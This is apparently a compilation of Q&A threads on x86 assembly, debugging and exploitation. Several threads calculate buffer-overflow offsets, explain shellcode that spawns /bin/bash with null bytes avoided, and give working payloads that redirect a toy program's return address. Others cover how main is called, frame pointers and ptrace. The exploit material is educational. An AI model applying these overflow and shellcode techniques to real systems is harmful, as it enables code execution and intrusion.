Buffer overflow appeared before it is expected - c

I'm trying to take a control over a stack overflow. First, here is an example of C code I compiled on an x32 VM Linux (gcc -fno-stack-protector -ggdb -o first first.c),
#include "stdio.h"
int CanNeverExecute()
{
printf("I can never execute\n");
return(0);
}
void GetInput()
{
char buffer[8];
gets(buffer);
puts(buffer);
}
int main()
{
GetInput();
return(0);
}
Then debugger (intel flavor): dump of assembler code for function GetInput:
0x08048455 <+0>: push ebp
0x08048456 <+1>: mov ebp,esp
0x08048458 <+3>: sub esp,0x28
0x0804845b <+6>: lea eax,[ebp-0x10]
Here we can see that sub esp, 0x28 reserves 40 bytes for a buffer variable (Right?).
CanNeverExecute function is located in address 0x0804843c.
So, in order to run CanNeverExecute function, I need to put 40 bytes into buffer variable, then goes 8 bytes for stored base pointer and then 8 bytes of return pointer I want to change.
So, I need a string of 48 ASCII symbols plus \x3c\x84\x04\x08 in the end (address of the CanNeverExecute function). That is in theory. But In practice I need only 20 bytes before address of the return pointer:
~/hacktest $ printf "12345678901234567890\x3c\x84\x04\x08" | ./first
12345678901234567890..
I can never execute
Illegal instruction (core dumped)
Why does it need only 20 bytes instead of 48? Where is my mistake?

First off, your assembly is 32-bit. Saved EBP and return address are 4 bytes each.
Second, the buffer variable does not start at stack top (ESP) - it starts at ebp-0x10. Which is 20 bytes away from the return address. 0x10 is 16 bytes, then 4 more for the saved EBP.

If You take bigger part of dissassembly You will see:
08048445 <GetInput>:
8048445: 55 push %ebp
8048446: 89 e5 mov %esp,%ebp
8048448: 83 ec 28 sub $0x28,%esp
804844b: 8d 45 f0 lea -0x10(%ebp),%eax
804844e: 89 04 24 mov %eax,(%esp)
8048451: e8 9a fe ff ff call 80482f0 <gets#plt>
8048456: 8d 45 f0 lea -0x10(%ebp),%eax
8048459: 89 04 24 mov %eax,(%esp)
804845c: e8 9f fe ff ff call 8048300 <puts#plt>
8048461: c9 leave
8048462: c3 ret
ebp is saved, esp is moved to ebp, then 40 is subtracted from esp (stack frame, as you wrote),
but pointer to buffer is passed to gets via eax register, and eax is loaded with ebp-0x10!
lea -0x10(%ebp),%eax
So You need only 20 bytes to overflow the buffer (16 reserved + 4 for stored base pointer on 32-bit system)

Related

How is main() called? Call to main() inside __libc_start_main()

I am trying to understand the call to main() inside __libc_start_main(). I know one of the parameters of __libc_start_main() is the address of main(). But, I am not able to figure out how is main() being called inside __libc_start_main() as there is no Opcode CALL or JMP. I see the following disassembly right before execution jumps to main().
0x7ffff7ded08b <__libc_start_main+203>: lea rax,[rsp+0x20]
0x7ffff7ded090 <__libc_start_main+208>: mov QWORD PTR fs:0x300,rax
=> 0x7ffff7ded099 <__libc_start_main+217>: mov rax,QWORD PTR [rip+0x1c3e10] # 0x7ffff7fb0eb0
I wrote a simple "Hello, World!!" in C. In the assembly above:
The execution jumps to main() right after instruction at address 0x7ffff7ded099.
Why is the MOV (to RAX) instruction causing a jump to main()?
Well, of course those instructions are not the ones that cause the call to main. I am not sure how you are stepping through those instructions, but if you are using GDB, you should use stepi instead of nexti.
I don't know why this happens precisely (some strange GDB or x86 quirk?) so I only speak from personal experience, but when reverse-engineering ELF binaries, I occasionally find that the nexti command executes several instructions before breaking. In your case, it misses a few movs before the actual call rax to call main().
What you can do to remediate this is to either use stepi, or to dump more code and then explicitly tell GDB to set breakpoints:
(gdb) x/20i
0x7ffff7ded08b <__libc_start_main+203>: lea rax,[rsp+0x20]
0x7ffff7ded090 <__libc_start_main+208>: mov QWORD PTR fs:0x300,rax
=> 0x7ffff7ded099 <__libc_start_main+217>: mov rax,QWORD PTR [rip+0x1c3e10] # 0x7ffff7fb0eb0
... more lines ...
... find call rax ...
(gdb) b *0x7ffff7dedXXX <= replace this
(gdb) continue
Here's what __libc_start_main() on my system does to call main():
21b6f: 48 8d 44 24 20 lea rax,[rsp+0x20] ; start preparing args
21b74: 64 48 89 04 25 00 03 mov QWORD PTR fs:0x300,rax
21b7b: 00 00
21b7d: 48 8b 05 24 93 3c 00 mov rax,QWORD PTR [rip+0x3c9324]
21b84: 48 8b 74 24 08 mov rsi,QWORD PTR [rsp+0x8]
21b89: 8b 7c 24 14 mov edi,DWORD PTR [rsp+0x14]
21b8d: 48 8b 10 mov rdx,QWORD PTR [rax]
21b90: 48 8b 44 24 18 mov rax,QWORD PTR [rsp+0x18] ; get address of main
21b95: ff d0 call rax ; actual call to main()
21b97: 89 c7 mov edi,eax
21b99: e8 32 16 02 00 call 431d0 <exit##GLIBC_2.2.5> ; exit(result of main)
The first three instructions are the same that you show. At the moment of call rax, rax will contain the address of main. After calling main, the result is moved into edi (first argument) and exit(result) is called.
Looking at glibc's source code for __libc_start_main(), we can see that this is exactly what happens:
/* ... */
#ifdef HAVE_CLEANUP_JMP_BUF
int not_first_call;
not_first_call = setjmp ((struct __jmp_buf_tag *) unwind_buf.cancel_jmp_buf);
if (__glibc_likely (! not_first_call))
{
/* ... a bunch of stuff ... */
/* Run the program. */
result = main (argc, argv, __environ MAIN_AUXVEC_PARAM);
}
else
{
/* ... a bunch of stuff ... */
}
#else
/* Nothing fancy, just call the function. */
result = main (argc, argv, __environ MAIN_AUXVEC_PARAM);
#endif
exit (result);
}
In my case I can see from the disassembly that HAVE_CLEANUP_JMP_BUF was defined when my glibc was compiled, so the actual call to main() is the one inside the if. I also suspect this is the case for your glibc.

How to convert an assembler program to shellcode correctly?

I programmed a program in nasm (x64) which should execute /bin/bash, and that works fine. Then i ran the program with objdump -D and i wrote down the machine code like this: \xbb\x68\x53\x48\xbb\x2f\x62\x69\x6e\x2f\x62\x61\x73\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05. Then i ran this with ./shell $(python -c 'print "\xbb\x68\x53\x48\xbb\x2f\x62\x69\x6e\x2f\x62\x61\x73\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"') and i got an illegal instruction. But the assembler program worked fine! Can someone help?
shell.c:
int main(int argc, char **argv) {
int (*func)();
func = (int (*)()) argv[1];
(int)(*func)();
}
bash.asm:
section .text
global start
start:
mov rbx, 0x68
push rbx
mov rbx, 0x7361622f6e69622f
push rbx
mov rdi, rsp
push rax
push rdi
mov rsi, rsp
mov al, 59
syscall
objdump:
./bash: file format elf64-x86-64
Disassembly of section .text:
0000000000401000 <start>:
401000: bb 68 00 00 00 mov $0x68,%ebx
401005: 53 push %rbx
401006: 48 bb 2f 62 69 6e 2f movabs $0x7361622f6e69622f,%rbx
40100d: 62 61 73
401010: 53 push %rbx
401011: 48 89 e7 mov %rsp,%rdi
401014: 50 push %rax
401015: 57 push %rdi
401016: 48 89 e6 mov %rsp,%rsi
401019: b0 3b mov $0x3b,%al
40101b: 0f 05 syscall
You are omitting the zero bytes here:
\xbb\x68\x53\x48\xbb\x2f\x62\x69\x6e\x2f\x62\x61\x73\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05
as opposed to
401000: bb 68 00 00 00 mov $0x68,%ebx
The zero bytes are part of the instructions and cannot be skipped. So you have to include them.
The problem is, however, that the zero bytes would terminate the argument string and hence have to be avoided. It is your duty as shellcode designer to construct it in a way, that it does not include byte values that may not occur. In many cases this means no zero bytes, because the shellcode is injected as a C string, but other values may be problematic in other situations, too.

Exploit a buffer overflow

For my studies I try to create a payload so that it overflows the buffer and calls a "secret" function called "target"
This is the code I use for testing on an i686
#include "stdio.h"
#include "string.h"
void target() {
printf("target\n");
}
void vulnerable(char* input) {
char buffer[16];
strcpy(buffer, input);
}
int main(int argc, char** argv) {
if(argc == 2)
vulnerable(argv[1]);
else
printf("Need an argument!");
return 0;
}
Task 1: Create a payload so that target() is being called.
This was rather easy to do by replacing the EIP with the address of the target function.
This is how the buffer looks
Buffer
(gdb) x/8x buffer
0xbfffef50: 0x41414141 0x41414141 0x00414141 0x08048532
0xbfffef60: 0x00000002 0xbffff024 0xbfffef88 0x080484ca
Payload I used was:
run AAAAAAAAAAAAAAAAAAAAAAAAAAAA$'\x7d\x84\x04\x08'
This works fine but stops with a segmentation fault.
Task 2: Modify the payload in a way that it does not give a segmentation fault
This is where I am stuck. Obviously it causes a segmentation fault because we do not call target with the call instruction and therefore there is no valid return address.
I tried to add the return address on the stack but that did not help
run AAAAAAAAAAAAAAAAAAAAAAAA$'\xca\x84\x04\x08'$'\x7d\x84\x04\x08'
Maybe someone can help me out with this. Probably I also have to add the saved EBP of main?
I attach the objdump of the programm
0804847d <target>:
804847d: 55 push %ebp
804847e: 89 e5 mov %esp,%ebp
8048480: 83 ec 18 sub $0x18,%esp
8048483: c7 04 24 70 85 04 08 movl $0x8048570,(%esp)
804848a: e8 c1 fe ff ff call 8048350 <puts#plt>
804848f: c9 leave
8048490: c3 ret
08048491 <vulnerable>:
8048491: 55 push %ebp
8048492: 89 e5 mov %esp,%ebp
8048494: 83 ec 28 sub $0x28,%esp
8048497: 8b 45 08 mov 0x8(%ebp),%eax
804849a: 89 44 24 04 mov %eax,0x4(%esp)
804849e: 8d 45 e8 lea -0x18(%ebp),%eax
80484a1: 89 04 24 mov %eax,(%esp)
80484a4: e8 97 fe ff ff call 8048340 <strcpy#plt>
80484a9: c9 leave
80484aa: c3 ret
080484ab <main>:
80484ab: 55 push %ebp
80484ac: 89 e5 mov %esp,%ebp
80484ae: 83 e4 f0 and $0xfffffff0,%esp
80484b1: 83 ec 10 sub $0x10,%esp
80484b4: 83 7d 08 02 cmpl $0x2,0x8(%ebp)
80484b8: 75 12 jne 80484cc <main+0x21>
80484ba: 8b 45 0c mov 0xc(%ebp),%eax
80484bd: 83 c0 04 add $0x4,%eax
80484c0: 8b 00 mov (%eax),%eax
80484c2: 89 04 24 mov %eax,(%esp)
80484c5: e8 c7 ff ff ff call 8048491 <vulnerable>
80484ca: eb 0c jmp 80484d8 <main+0x2d>
80484cc: c7 04 24 77 85 04 08 movl $0x8048577,(%esp)
80484d3: e8 58 fe ff ff call 8048330 <printf#plt>
80484d8: b8 00 00 00 00 mov $0x0,%eax
80484dd: c9 leave
80484de: c3 ret
80484df: 90 nop
You need enough data to fill the reserved memory for the stack where 'buffer' is located, then more to overwrite the stack frame pointer, then overwrite the return address with the address of target() and then one more address within target() but not at the very beginning of the function - enter it so the old stack frame pointer is not pushed on the stack. That will cause you to run target instead of returning properly from vulnerable() and then run target() again so you return from target() to main() and so exit without a segmentation fault.
When we enter vulnerable() for the first time and are about to put data
into the 'buffer' variable the stack looks like this:
-----------
| 24-bytes of local storage - 'buffer' lives here
-----------
| old stack frame pointer (from main) <-- EBP points here
-----------
| old EIP (address in main)
-----------
| 'input' argument for 'vulnerable'
-----------
| top of stack for main
-----------
| ... more stack here ...
So starting at the address of 'buffer' we need to put in 24-bytes of junk to
get past the local storage reserved on the stack, then 4-more bytes to get
past the old stack frame pointer stored on the stack, then we are at the
location where the old EIP is stored. That's the instruction pointer that the CPU follows blindly. We like him. He's going to help us crush this program. We overwrite the value of the old EIP in the stack which currently points to an address in main() with the start address of target() which is found via the gdb
disassemble command:
(gdb) disas target
Dump of assembler code for function target:
0x08048424 <+0>: push %ebp
0x08048425 <+1>: mov %esp,%ebp
0x08048427 <+3>: sub $0x18,%esp
0x0804842a <+6>: movl $0x8048554,(%esp)
0x08048431 <+13>: call 0x8048354 <puts#plt>
0x08048436 <+18>: leave
0x08048437 <+19>: ret
End of assembler dump.
The address of the target() function is 0x08048424. Since the (my system at least) system is little endian we enter those values with the LSB first so x24, x84, x04, and x08.
But that leaves us with a problem because as vulnerable() returns it pops all
the junk that we put in the stack off the stack and we are left with a stack
that looks like this when we are just about to process in target() for the
first time:
-----------
| 'input' argument for 'vulnerable'
-----------
| top of stack for main
-----------
| ... more stack here ...
So when target() wants to return it will not find the return address on the
top of its stack as expected and so will have a segmentation fault.
So we want to force a new return value onto the top of the stack before we
start processing in target(). But what value to choose? We don't want to push
the EBP because it contains garbage. Remember? We shoved garbage into it when we overwrote 'buffer'. So instead push the target() instruction just after the
push %ebp
( in this case address 0x08048425 ).
This means that the stack will look like this when target() is ready to return
for the first time:
-----------
| address of mov %esp, %ebp instruction in target()
-----------
| top of stack for main
-----------
| ... more stack here ...
So upon return from target() the first time , the EIP will now point at the second instruction in target(), which means that the second time we process through target() it has the same stack that main() had when it processed. The top of the stack is the same top of the stack for main(). Now the stack looks like:
-----------
| top of stack for main
-----------
| ... more stack here ...
So when target() returns the second time it has a good stack to return with
since it is using the same stack that main() used and so the program exits normally.
So to sum it up that is 28-bytes followed by the address of the first instruction in target() followed by the address of the second instruction in target().
sys1:/usr2/home> ./buggy AAAAAAAAAABBBBBBBBBBCCCCCCCC$'\x24\x84\x04\x08'$'\x25\x84\x04\x08'
target
target
sys1:/usr2/home>

Try to understand calling process in assembly code

I wrote a very simple program in C and try to understand the function calling process.
#include "stdio.h"
void Oh(unsigned x) {
printf("%u\n", x);
}
int main(int argc, char const *argv[])
{
Oh(0x67611c8c);
return 0;
}
And its assembly code seems to be
0000000100000f20 <_Oh>:
100000f20: 55 push %rbp
100000f21: 48 89 e5 mov %rsp,%rbp
100000f24: 48 83 ec 10 sub $0x10,%rsp
100000f28: 48 8d 05 6b 00 00 00 lea 0x6b(%rip),%rax # 100000f9a <_printf$stub+0x20>
100000f2f: 89 7d fc mov %edi,-0x4(%rbp)
100000f32: 8b 75 fc mov -0x4(%rbp),%esi
100000f35: 48 89 c7 mov %rax,%rdi
100000f38: b0 00 mov $0x0,%al
100000f3a: e8 3b 00 00 00 callq 100000f7a <_printf$stub>
100000f3f: 89 45 f8 mov %eax,-0x8(%rbp)
100000f42: 48 83 c4 10 add $0x10,%rsp
100000f46: 5d pop %rbp
100000f47: c3 retq
100000f48: 0f 1f 84 00 00 00 00 nopl 0x0(%rax,%rax,1)
100000f4f: 00
0000000100000f50 <_main>:
100000f50: 55 push %rbp
100000f51: 48 89 e5 mov %rsp,%rbp
100000f54: 48 83 ec 10 sub $0x10,%rsp
100000f58: b8 8c 1c 61 67 mov $0x67611c8c,%eax
100000f5d: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%rbp)
100000f64: 89 7d f8 mov %edi,-0x8(%rbp)
100000f67: 48 89 75 f0 mov %rsi,-0x10(%rbp)
100000f6b: 89 c7 mov %eax,%edi
100000f6d: e8 ae ff ff ff callq 100000f20 <_Oh>
100000f72: 31 c0 xor %eax,%eax
100000f74: 48 83 c4 10 add $0x10,%rsp
100000f78: 5d pop %rbp
100000f79: c3 retq
Well, I don't quite understand the argument passing process, since there is only one parameter passed to Oh function, I could under stand this
100000f58: b8 8c 1c 61 67 mov $0x67611c8c,%eax
So what does the the code below do? Why rbp? Isn't it abandoned in X86-64 assembly? If it is a x86 style assembly, how can I generate the x86-64 style assembly using clang? If it is x86, it doesn't matter, could any one explains the below code line by line for me?
100000f5d: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%rbp)
100000f64: 89 7d f8 mov %edi,-0x8(%rbp)
100000f67: 48 89 75 f0 mov %rsi,-0x10(%rbp)
100000f6b: 89 c7 mov %eax,%edi
100000f6d: e8 ae ff ff ff callq 100000f20 <_Oh>
You might get cleaner code if you turned optimizations on, or you might not. But, here’s what that does.
The %rbp register is being used as a frame pointer, that is, a pointer to the original top of the stack. It’s saved on the stack, stored, and restored at the end. Far from being removed in x86_64, it was added there; the 32-bit equivalent was %ebp.
After this value is saved, the program allocates sixteen bytes off the stack by subtracting from the stack pointer.
There then is a very inefficient series of copies that sets the first argument of Oh() as the second argument of printf() and the constant address of the format string (relative to the instruction pointer) as the first argument of printf(). Remember that, in this calling convention, the first argument is passed in %rdi (or %edi for 32-bit operands) and the second in %rsi This could have been simplified to two instructions.
After calling printf(), the program (needlessly) saves the return value on the stack, restores the stack and frame pointers, and returns.
In main(), there’s similar code to set up the stack frame, then the program saves argc and argv (needlessly), then it moves around the constant argument to Oh into its first argument, by way of %eax. This could have been optimized into a single instruction. It then calls Oh(). On return, it sets its return value to 0, cleans up the stack, and returns.
The code you’re asking about does the following: stores the constant 32-bit value 0 on the stack, saves the 32-bit value argc on the stack, saves the 64-bit pointer argv on the stack (the first and second arguments to main()), and sets the first argument of the function it is about to call to %eax, which it had previously loaded with a constant. This is all unnecessary for this program, but would have been necessary had it needed to use argc and argv after the call, when those registers would have been clobbered. There’s no good reason it used two steps to load the constant instead of one.
As Jester mentions you still have frame pointers on (to aid debugging)so stepping through main:
0000000100000f50 <_main>:
First we enter a new stack frame, we have to save the base pointer and move the stack to the new base. Also, in x86_64 the stack frame has to be aligned to a 16 byte boundary (hence moving the stack pointer by 0x10).
100000f50: push %rbp
100000f51: mov %rsp,%rbp
100000f54: sub $0x10,%rsp
As you mention, x86_64 passes parameters by register, so load the param in to the register:
100000f58: mov $0x67611c8c,%eax
??? Help needed
100000f5d: movl $0x0,-0x4(%rbp)
From here: "Registers RBP, RBX, and R12-R15 are callee-save registers", so if we want to save other resisters then we have to do it ourselves ....
100000f64: mov %edi,-0x8(%rbp)
100000f67: mov %rsi,-0x10(%rbp)
Not really sure why we didn't just load this in %edi where it needs to be for the call to begin with, but we better move it there now.
100000f6b: mov %eax,%edi
Call the function:
100000f6d: callq 100000f20 <_Oh>
This is the return value (passed in %eax), xor is a smaller instruction than load 0, so is a cmmon optimization:
100000f72: xor %eax,%eax
Clean up that stack frame we added earlier (not really sure why we saved those registers on it when we didn't use them)
100000f74: add $0x10,%rsp
100000f78: pop %rbp
100000f79: retq

Detect call's offset with ptrace

I'm trying to do a program that can detect calls with the function ptrace.
Using PTRACE_SINGLESTEP I can run a program instructions by instructions, then, when I get the OP_CODE 0xe8 pointed by the register RIP, I use PTRACE_PEEKTEXT to get the 4 next bytes after the adress pointed by RIP.
Then, according to the documentation that I found on internet, the 4 bytes coutains an offset referring to the location to jump.
It seems like PTRACE_PEEKTEXT is returning some weird values, and I get offsets too big.
Here my code below:
instr_num = ptrace(PTRACE_PEEKTEXT, this->pid, regs.rip, 0);
dest = ptrace(PTRACE_PEEKTEXT, this->pid, regs.rip + 1, 0);
if (instr_num == 0xe8)
{
printf("call : %ld\n", regs.rip + dest);
}
And here's the output:
call : -2853719444197214464
call : -2853719444197214464
call : -2853719444197214464
And this is the objdump -D output, and as you can see there is 15 bytes of offset between the call from the main and the beginning of the function func:
00000000004004c4 <func>:
4004c4: 55 push %rbp
4004c5: 48 89 e5 mov %rsp,%rbp
4004c8: 5d pop %rbp
4004c9: c3 retq
00000000004004ca <main>:
4004ca: 55 push %rbp
4004cb: 48 89 e5 mov %rsp,%rbp
4004ce: b8 00 00 00 00 mov $0x0,%eax
4004d3: e8 ec ff ff ff callq 4004c4 <func>
4004d8: 5d pop %rbp
4004d9: c3 retq
If just after I detected a call, I do a ptrace(PTRACE_SINGLESTEP) once, will my RIP contain the adress of the function I just jumped to ? According to my tests it seems not to, but I think it should.
Try:
printf("call : 0x%lx\n", regs.rip + (long) (int) (dest & (unsigned long) UINT_MAX);
dest is a 64-bit value but the offset is encoded here on 32 bits. Printing in hex is much nicer for this kind of code

Resources